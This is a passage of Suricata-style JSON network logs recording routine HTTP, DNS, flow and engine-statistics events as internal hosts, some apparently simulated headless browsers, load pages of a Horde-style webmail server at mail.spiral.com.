Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3978}} {"timestamp":"2020-02-29T00:01:24.462742+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6966},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37746,"tx_id":0}} {"timestamp":"2020-02-29T00:01:24.471666+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59007,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61595,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:24.576661+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59007,"proto":"UDP","dns":{"type":"answer","id":61595,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:24.576661+0000","flow_id":1948590856745586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59007,"proto":"UDP","dns":{"type":"answer","id":61595,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:24.660332+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8105}} {"timestamp":"2020-02-29T00:01:28.331895+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52650,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.000577+0000","flow_id":71243452414947,"event_type":"flow","src_ip":"192.168.10.122","src_port":56790,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:28.621539+0000","end":"2020-02-28T23:56:28.733376+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:29.023050+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3978},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.661634+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34692,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8105},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33524,"tx_id":1}} {"timestamp":"2020-02-29T00:01:29.964448+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58746,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37232,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:30.077302+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58746,"proto":"UDP","dns":{"type":"answer","id":37232,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:30.077302+0000","flow_id":943744603502432,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58746,"proto":"UDP","dns":{"type":"answer","id":37232,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:30.169791+0000","flow_id":679183207983578,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18979}} {"timestamp":"2020-02-29T00:01:31.000234+0000","event_type":"stats","stats":{"uptime":13743,"capture":{"kernel_packets":132263,"kernel_drops":0},"decoder":{"pkts":132278,"bytes":91855239,"invalid":176,"ipv4":130857,"ipv6":8,"ethernet":132278,"raw":0,"null":0,"sll":0,"tcp":125893,"udp":4774,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2660,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2676,"synack":2667,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1708,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2176,"failed_udp":106},"tx":{"http":4435,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2252}},"flow_mgr":{"closed_pruned":2637,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20498,"memcap_state":0,"memcap_global":0},"http":{"memuse":190556,"memcap":0}}} {"timestamp":"2020-02-29T00:01:32.000295+0000","flow_id":2134528561762561,"event_type":"flow","src_ip":"192.168.10.122","src_port":56514,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:31.315649+0000","end":"2020-02-28T23:56:31.423684+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000227+0000","flow_id":285721234508130,"event_type":"flow","src_ip":"192.168.10.122","src_port":59579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.657762+0000","end":"2020-02-28T23:56:32.766092+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000465+0000","flow_id":1885441933501218,"event_type":"flow","src_ip":"192.168.10.122","src_port":49099,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.844578+0000","end":"2020-02-28T23:56:32.956150+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:33.000662+0000","flow_id":1923147451373618,"event_type":"flow","src_ip":"192.168.10.122","src_port":34286,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.235570+0000","end":"2020-02-28T23:56:32.347026+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:34.000690+0000","flow_id":1913015623544439,"event_type":"flow","src_ip":"192.168.10.122","src_port":35939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:32.978551+0000","end":"2020-02-28T23:56:33.086800+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.000485+0000","flow_id":43983295356035,"event_type":"flow","src_ip":"192.168.10.122","src_port":46502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:34.269443+0000","end":"2020-02-28T23:56:34.377451+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.000762+0000","flow_id":2204137096906147,"event_type":"flow","src_ip":"192.168.10.122","src_port":40372,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:56:34.099747+0000","end":"2020-02-28T23:56:34.211348+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:35.170866+0000","flow_id":679183207983578,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34694,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18979},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:01:36.000552+0000","flow_id":76715215099822,"event_type":"flow","src_ip":"192.168.10.130","src_port":33908,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":54,"pkts_toclient":68,"bytes_toserver":5107,"bytes_toclient":83382,"start":"2020-02-28T23:49:57.202670+0000","end":"2020-02-28T23:51:32.624050+0000","age":95,"state":"established","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1a","tcp_flags_tc":"1f","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"fin_wait2"}} {"timestamp":"2020-02-29T00:01:37.000831+0000","flow_id":1537012727240391,"event_type":"flow","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":8,"bytes_toserver":1283,"bytes_toclient":6321,"start":"2020-02-29T00:00:31.218823+0000","end":"2020-02-29T00:00:36.480214+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:38.000216+0000","event_type":"stats","stats":{"uptime":13750,"capture":{"kernel_packets":132316,"kernel_drops":0},"decoder":{"pkts":132320,"bytes":91877900,"invalid":176,"ipv4":130897,"ipv6":8,"ethernet":132320,"raw":0,"null":0,"sll":0,"tcp":125931,"udp":4776,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094464},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2661,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2677,"synack":2668,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2177,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2253}},"flow_mgr":{"closed_pruned":2637,"new_pruned":15,"est_pruned":2231,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":2,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":37285,"memcap":0}}} {"timestamp":"2020-02-29T00:01:44.000388+0000","flow_id":2150733489452806,"event_type":"flow","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1393,"bytes_toclient":6321,"start":"2020-02-29T00:00:37.866054+0000","end":"2020-02-29T00:00:43.093966+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:45.000183+0000","event_type":"stats","stats":{"uptime":13757,"capture":{"kernel_packets":132316,"kernel_drops":0},"decoder":{"pkts":132320,"bytes":91877900,"invalid":176,"ipv4":130897,"ipv6":8,"ethernet":132320,"raw":0,"null":0,"sll":0,"tcp":125931,"udp":4776,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2661,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2677,"synack":2668,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2177,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2253}},"flow_mgr":{"closed_pruned":2638,"new_pruned":15,"est_pruned":2231,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":37205,"memcap":0}}} {"timestamp":"2020-02-29T00:01:45.001653+0000","flow_id":452932915956904,"event_type":"flow","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1180,"bytes_toclient":709,"start":"2020-02-29T00:00:16.593064+0000","end":"2020-02-29T00:00:44.595345+0000","age":28,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:46.933558+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57196,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:47.039247+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56014,"proto":"UDP","dns":{"type":"answer","id":57196,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:47.039247+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56014,"proto":"UDP","dns":{"type":"answer","id":57196,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:47.144742+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52259,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23414,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:47.250009+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52259,"proto":"UDP","dns":{"type":"answer","id":23414,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:47.250009+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52259,"proto":"UDP","dns":{"type":"answer","id":23414,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:50.000629+0000","flow_id":1256757506654995,"event_type":"flow","src_ip":"192.168.10.122","src_port":60917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:48.967443+0000","end":"2020-02-28T23:56:49.075802+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:52.000199+0000","event_type":"stats","stats":{"uptime":13764,"capture":{"kernel_packets":132330,"kernel_drops":0},"decoder":{"pkts":132361,"bytes":91905859,"invalid":178,"ipv4":130938,"ipv6":8,"ethernet":132361,"raw":0,"null":0,"sll":0,"tcp":125966,"udp":4780,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2662,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2678,"synack":2669,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":136,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2179,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2255}},"flow_mgr":{"closed_pruned":2640,"new_pruned":15,"est_pruned":2232,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18515,"memcap_state":0,"memcap_global":0},"http":{"memuse":37125,"memcap":0}}} {"timestamp":"2020-02-29T00:01:52.001029+0000","flow_id":2118594249540551,"event_type":"flow","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":16,"bytes_toserver":2706,"bytes_toclient":11394,"start":"2020-02-29T00:00:42.377799+0000","end":"2020-02-29T00:00:51.314644+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:55.000643+0000","flow_id":2239244160873526,"event_type":"flow","src_ip":"192.168.10.122","src_port":46652,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:54.144438+0000","end":"2020-02-28T23:56:54.252490+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:58.221235+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49258,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:58.332439+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56903,"proto":"UDP","dns":{"type":"answer","id":49258,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:58.332439+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56903,"proto":"UDP","dns":{"type":"answer","id":49258,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:58.479290+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7611}} {"timestamp":"2020-02-29T00:01:59.000177+0000","event_type":"stats","stats":{"uptime":13771,"capture":{"kernel_packets":132364,"kernel_drops":0},"decoder":{"pkts":132366,"bytes":91906141,"invalid":178,"ipv4":130941,"ipv6":8,"ethernet":132366,"raw":0,"null":0,"sll":0,"tcp":125969,"udp":4780,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2662,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2678,"synack":2669,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":136,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2179,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2255}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2233,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18514,"memcap_state":0,"memcap_global":0},"http":{"memuse":122658,"memcap":0}}} {"timestamp":"2020-02-29T00:02:01.583898+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41614,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59173,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:01.605340+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7611},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39619,"tx_id":0}} 